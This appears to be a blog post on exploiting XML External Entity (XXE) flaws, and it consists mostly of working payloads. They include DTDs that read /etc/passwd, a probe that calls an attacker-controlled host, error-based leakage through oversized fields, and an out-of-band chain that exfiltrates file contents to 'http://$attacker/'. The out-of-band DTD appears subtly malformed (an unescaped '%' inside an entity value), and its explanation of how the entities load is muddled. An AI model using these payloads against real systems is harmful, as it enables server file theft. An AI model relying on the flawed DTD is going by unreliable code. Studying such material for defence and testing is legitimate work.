A XML External Entity is a technique where a XML file contains a statement which leads the XML parser to include results from an external source into the XML file. The benign idea is for example to replace a string multiple times with a predefined value:
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name "Olaf">
]>
<data>
...
<name>&name;</name>
...
</data>
Important: data is here the name of the root node. It could be root, or invoice-entity, etc. Depending what the DTD has defined.
Include local files
With the SYSTEM keyword, external files can be included:
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<data>
...
<name>&name;</name>
...
</data>
Include external sources
To check if a XXE exist, open a local server and use this:
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "http://$attacker/bla">
]>
<data>
...
<name>&name;</name>
...
</data>
If the XML parser connects to the local system, well…
Or — try to include a third-party source which is available via the target system, but not from the attacker’s system.
Error-based exploitation
If a parser outputs errors due to malformed XML or invalid field constraints (length!), maybe it will also output rendered parts of the query. Example:
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY name SYSTEM "file:///etc/passwd">
]>
<data>
...
<name>fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill fill &name;</name>
...
</data>
If the length of the name field is too large, maybe an error is shown, which includes the interpolated value. Try this with various fields, format violations, etc.
Out-of-band exploitation
External DTD files can be included. Provide one on your server, e.g. http://$attacker/e.dtd:
<!ENTITY % name SYSTEM "file:///etc/passwd">
<!ENTITY % external "<!ENTITY % exfil SYSTEM 'http://$attacker/?%name;'>" >
This defines the entity exfil.
Lets use this payload:
<!DOCTYPE oob [
<!ENTITY % base SYSTEM "http://$attacker/e.dtd">
%base;
%external;
%exfil;
]>
<data>
</data>
This will load the entity base (which was defined in the targeted system). Then, it evaluates external. For this, the external DTD needs to be loaded. Then, it needs to evaluate exfil, which performs the request and passes the value to the attacker.
Leave a Reply
You must be logged in to post a comment.